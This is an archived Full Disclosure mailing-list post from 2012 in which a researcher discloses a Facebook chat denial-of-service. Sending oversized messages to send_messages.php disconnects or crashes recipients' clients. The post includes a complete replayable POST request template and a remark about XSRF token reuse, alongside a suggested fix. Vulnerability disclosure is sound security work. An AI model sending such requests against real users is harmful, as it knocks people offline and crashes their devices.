Full Disclosure mailing list archives
A damn aweful facebook DOS
From: "Chris C. Russo" <chris () calciumsec com>
Date: Thu, 08 Nov 2012 04:28:33 -0300
Good news everyone! The last time I reported a security flaw to facebook, it took around 6 weeks until they replied, telling me that there was no flaw at all. Perhaps that's why I decided to make public any flaw on facebook from now on. A few many years have passed since it was possible to disconnect a user from MSN by sending a huge amount of big packets, a quite classic Denial Of Service. It seems like not so many things have changed from then. Here's what I've found: The chat module, which at this moment I can't use since it looks like I have been blocked after testing it using burp suit, doesn't have any kind of limit in the amount of characters that can be sent. It has been possible to disconnect 3 different testing users (3 out of 3) by sending big enough messages, one of them reported that his tablet restarted after the reception, and it wasn't longer possible to open the FB app anymore, since the chat log would remain there and it would make the app crash again. The issue is exactly on www.facebook.com/ajax/mercury/send_messages.php specifically in the parameter message_batch[0][body]. During the test, I've seen several packets causing an internal server error (500 as response code), while our collaborators where disconnected. In order to prevent this, the length of that parameter should be analyzed *before* sending the information to the addressee user by the asynchronous connection. Personally I believe that there must be something wrong with XSRF tokens as well, because it would allow me to send several packets using the same token that I initially extracted, however I couldn't this information due the ban prevention mechanism. Here you have the technical details: -------------------------------------------------------- By sending the following packet it's possible to cause a DOS condition to a remote user that doesn't even need to have the attacker in the contact list or as "friend", since it's possible to send messages to almost every user. http://www.facebook.com/ajax/mercury/send_messages.php message_batch[0][action_type]=ma-type%3Auser-generated-message &message_batch[0][thread_id] &message_batch[0][author]=fbid%3A100000000000000 &message_batch[0][author_email] &message_batch[0][coordinates] &message_batch[0][timestamp]=1352175498252 &message_batch[0][timestamp_absolute]=Today &message_batch[0][timestamp_relative]=1%3A19am &message_batch[0][is_unread]=false &message_batch[0][is_cleared]=false &message_batch[0][is_forward]=false &message_batch[0][spoof_warning]=false &message_batch[0][source]=source%3Achat%3Aweb &message_batch[0][source_tags][0]=source%3Achat &message_batch[0][body]=%3C<EXTREMLY LONG MESSAGE HERE>%3E &message_batch[0][has_attachment]=false &message_batch[0][html_body]=false & &message_batch[0][specific_to_list][0]=fbid%3A126000000 &message_batch[0][specific_to_list][1]=fbid%3A100000000000000 &message_batch[0][status]=0 &message_batch[0][message_id]=%3C1352175400000%3A3112200000-1080509979%40mail.projektitan.com%3E & &message_batch[0][client_thread_id]=user%3A1263600000 &client=mercury &__user=100001220521369 &__a=1 &fb_dtsg=AQDT8YAC &phstamp=1658168845689000000000 (Properly replace the <EXTREMLY LONG MESSAGE HERE> before testing) This might not be the best vulnerability description ever, but I hope it helps solving the condition as soon as possible. Have fun. PS: There's much more. -- Success, *forward, quick.* Chris C. Russo Más de 100,000 Km recorridos, conservo direcciones, presiono con ambición, avanzo con delicadeza, flexibilizo para alcanzar, creo escenarios, cambio realidades. w: www.calciumsec.com e: chris () calciumsec com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- A damn aweful facebook DOS Chris C. Russo (Nov 09)
- Re: A damn aweful facebook DOS Bill Weiss (Nov 09)
- Re: A damn aweful facebook DOS Chris C. Russo (Nov 09)
- Re: A damn aweful facebook DOS Bacon Zombie (Nov 09)
- Re: A damn aweful facebook DOS Chris C. Russo (Nov 09)
- Re: A damn aweful facebook DOS Chris C. Russo (Nov 09)
- Re: A damn aweful facebook DOS Bill Weiss (Nov 09)